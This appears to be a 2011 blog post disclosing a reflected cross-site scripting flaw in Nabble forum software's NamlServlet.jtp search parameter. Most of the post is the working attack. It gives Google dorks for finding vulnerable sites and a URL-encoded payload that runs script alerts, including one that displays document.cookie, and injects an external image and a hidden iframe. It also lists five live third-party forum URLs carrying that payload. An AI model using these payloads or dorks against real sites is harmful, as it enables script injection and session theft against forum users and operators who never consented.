miercuri, 12 octombrie 2011

Nabble Forums Cross Site Scripting

Interesting..

# Date: 13.10.2011
# Author: Sony
# Software Link: http://www.nabble.com/
# Google Dorks: inurl:NamlServlet.jtp or inurl:/template/NamlServlet.jtp?macro=
# Browser: Mozilla Firefox
# Blog : http://st2tea.blogspot.com
..................................................................

Well..
We can see error on the page..

http://dwr.2114559.n2.nabble.com/template/NamlServlet.jtp?macro=search_page%20&node=5394489&query=xmlbeans

Our XSS is here:

template/NamlServlet.jtp?macro=search_page[XSS]%20&node=5394489&query=xmlbeans

After:

http://dwr.2114559.n2.nabble.com/template/NamlServlet.jtp?macro=search_page%20%22%3E%3C/title%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E%3Cscript%3Ealert%28%22TEST%22%29%3C/script%3E%3Cscript%3Ealert%28%22by%20Sony%22%29%3C/script%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%22%3E%3Cimg%20src=%22http://top10best.ucoz.ru/Cats1/cat1_1.jpg%22%20style=%22height:%20800px;%20width:%20950px;%22%3Ciframe%20src%20=http://www.youtube.com/watch?v=TCUaQzw707M%22%20width=%220%22%20height=%220%22%20\%3E%3C/div%3E&node=5394489&query=xmlbeans

Some Demo with Google Dorks:
http://forum.nyskiblog.com/template/NamlServlet.jtp?macro=search_page%20%22%3E%3C/title%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E%3Cscript%3Ealert%28%22TEST%22%29%3C/script%3E%3Cscript%3Ealert%28%22by%20Sony%22%29%3C/script%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%22%3E%3Cimg%20src=%22http://top10best.ucoz.ru/Cats1/cat1_1.jpg%22%20style=%22height:%20800px;%20width:%20950px;%22%3Ciframe%20src%20=http://www.youtube.com/watch?v=TCUaQzw707M%22%20width=%220%22%20height=%220%22%20\%3E%3C/div%3E&node=5394489&query=xmlbeans

http://discuss.supergenpass.com/template/NamlServlet.jtp?macro=search_page%20%22%3E%3C/title%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E%3Cscript%3Ealert%28%22TEST%22%29%3C/script%3E%3Cscript%3Ealert%28%22by%20Sony%22%29%3C/script%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%22%3E%3Cimg%20src=%22http://top10best.ucoz.ru/Cats1/cat1_1.jpg%22%20style=%22height:%20800px;%20width:%20950px;%22%3Ciframe%20src%20=http://www.youtube.com/watch?v=TCUaQzw707M%22%20width=%220%22%20height=%220%22%20\%3E%3C/div%3E&node=5394489&query=xmlbeans

http://www.pcl-users.org/template/NamlServlet.jtp?macro=search_page%20%22%3E%3C/title%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E%3Cscript%3Ealert%28%22TEST%22%29%3C/script%3E%3Cscript%3Ealert%28%22by%20Sony%22%29%3C/script%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%22%3E%3Cimg%20src=%22http://top10best.ucoz.ru/Cats1/cat1_1.jpg%22%20style=%22height:%20800px;%20width:%20950px;%22%3Ciframe%20src%20=http://www.youtube.com/watch?v=TCUaQzw707M%22%20width=%220%22%20height=%220%22%20\%3E%3C/div%3E&node=5394489&query=xmlbeans

http://nabble.documentfoundation.org/template/NamlServlet.jtp?macro=search_page%20%22%3E%3C/title%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E%3Cscript%3Ealert%28%22TEST%22%29%3C/script%3E%3Cscript%3Ealert%28%22by%20Sony%22%29%3C/script%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%22%3E%3Cimg%20src=%22http://top10best.ucoz.ru/Cats1/cat1_1.jpg%22%20style=%22height:%20800px;%20width:%20950px;%22%3Ciframe%20src%20=http://www.youtube.com/watch?v=TCUaQzw707M%22%20width=%220%22%20height=%220%22%20\%3E%3C/div%3E&node=5394489&query=xmlbeans

Publicat de Sony la 20:38
Etichete: ,

0 comentarii:

Trimiteți un comentariu

Rețineți: Numai membrii acestui blog pot posta comentarii.